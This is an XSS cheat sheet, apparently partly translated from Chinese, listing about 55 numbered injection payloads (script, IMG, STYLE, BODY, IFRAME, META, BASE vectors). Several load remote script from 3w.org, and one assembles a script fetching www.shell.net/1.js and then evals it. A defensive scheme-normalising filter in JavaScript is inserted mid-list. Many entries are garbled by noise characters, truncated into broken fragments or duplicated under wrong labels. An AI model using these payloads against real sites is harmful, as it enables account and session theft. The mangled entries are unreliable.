(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Fixing a broken IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC=\'#\'" /span>

9 ^" t# `6 n8 O- w) k% P(16)解决限制字符(要求同页面)
# t2 w& \( f4 y! s$ G; ^7 x) Y% K; x<script>z=’document.’</script>
1 u& h+ k/ j) E8 N<script>z=z+’write(“‘</script>$ X6 B& M8 j; L; F! h* }; B/ S! p; d
<script>z=z+’<script’</script>9 ~+ W; W8 h. W6 a3 E
<script>z=z+’ src=ht’</script>3 q& s+ x! J* D, y% a4 R
<script>z=z+’tp://ww’</script>
; q7 r- ?8 g3 K- s# B6 ^$ }' h2 d<script>z=z+’w.shell’</script>
2 z3 d7 _/ O8 {/ e% h<script>z=z+’.net/1.’</script>; C* ]: R3 Z# h' G
<script>z=z+’js></sc’</script>6 i* l( U& l3 m! k. \
<script>z=z+’ript>”)’</script>
8 X7 k" y7 v ?- k% R<script>eval_r(z)</script>
4 X+ o8 n- d$ e+ E/ W- Z
! h! U# o6 c2 L$ ]5 D(17)空字符
3 ?: L5 X4 Z6 P2 w$ `3 f8 T) Mperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out; z/ w, d# n: u7 a w$ S9 |* `
6 v3 a& `1 o7 Q(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用8 t, w& E; n) a5 m. R# n1 y- A
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out; @, S2 i# [" e# _$ n- R- r
+ O; R( m% w7 ?) c. t" _+ O
(19)Spaces和meta前的IMG标签: ?# M# _+ {* T. b" _
<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>, X- ]" f0 t/ L# Z6 a( A
+ W% D* d- \0 A& ], l
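Items (3) through (19) are all the same trick seen from the defender's side: the attribute value is not literally `javascript:`, but the browser normalises it into one. The following is an added example, not code from the original cheat sheet, showing the normalisation a filter has to perform before checking the scheme; the sample values, the `example.test` host and the function names are constructed for this illustration.

```javascript
// Added example, not from the original cheat sheet: a defender-side normaliser
// that undoes the scheme obfuscations of items (3)-(19) before checking whether
// an attribute value is really a javascript: URL.

// Numeric character references, decimal or hex; browsers accept them without the
// trailing semicolon and with leading zeros, so the regex does too.
const ENTITY_RE = /&#(x[0-9a-f]+|[0-9]+);?/gi;

function decodeNumericEntities(s) {
  return s.replace(ENTITY_RE, (_, code) => {
    const hex = code[0].toLowerCase() === 'x';
    const cp = hex ? parseInt(code.slice(1), 16) : parseInt(code, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : ''; // guard RangeError
  });
}

// Reduce a value to the scheme a browser would act on: decode entities, drop
// leading whitespace/control chars (" &#14; javascript:"), remove tab, LF, CR
// (which URL parsing strips) and NUL (relied on by items 17-18) inside the
// scheme ("jav\tascript:", "java\0script:"), then lower-case ("JaVaScRiPt:").
function normalizeScheme(value) {
  let v = decodeNumericEntities(String(value));
  v = v.replace(/^[\u0000-\u0020]+/, '');
  v = v.replace(/[\u0000\u0009\u000a\u000d]/g, '');
  return v.toLowerCase();
}

const SCRIPT_SCHEMES = ['javascript:', 'vbscript:'];
function isScriptUrl(value) {
  const v = normalizeScheme(value);
  return SCRIPT_SCHEMES.some((scheme) => v.startsWith(scheme));
}

// Constructed samples (not taken from the page) covering the variants above.
const URL_SAMPLES = [
  'JaVaScRiPt:alert(1)',                                                   // (4)
  '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)', // (5)
  '&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert(1)', // (9)
  '&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert(1)',     // (10)
  'jav\tascript:alert(1)',                                                 // (11) tab
  'jav&#x09;ascript:alert(1)',                                             // (12) encoded tab
  'jav\nascript:alert(1)',                                                 // (13) newline
  'java\u0000script:alert(1)',                                             // (17) NUL
  ' &#14; javascript:alert(1)',                                            // (19) leading junk
  'https://example.test/app.js',                                           // benign
  'java script:alert(1)',                                                  // benign: a plain space is not stripped
];

function flagScriptUrls(values) {
  return values.filter(isScriptUrl);
}
```

Only tab, LF and CR are removed inside the scheme; a plain space is left in place, so a filter built this way does not over-block ordinary values.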
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC=\'#\'" /span>

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC=\'#\'" /span>

(35) IMG LOWSRC
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC=\'#\'" /IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression split up
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>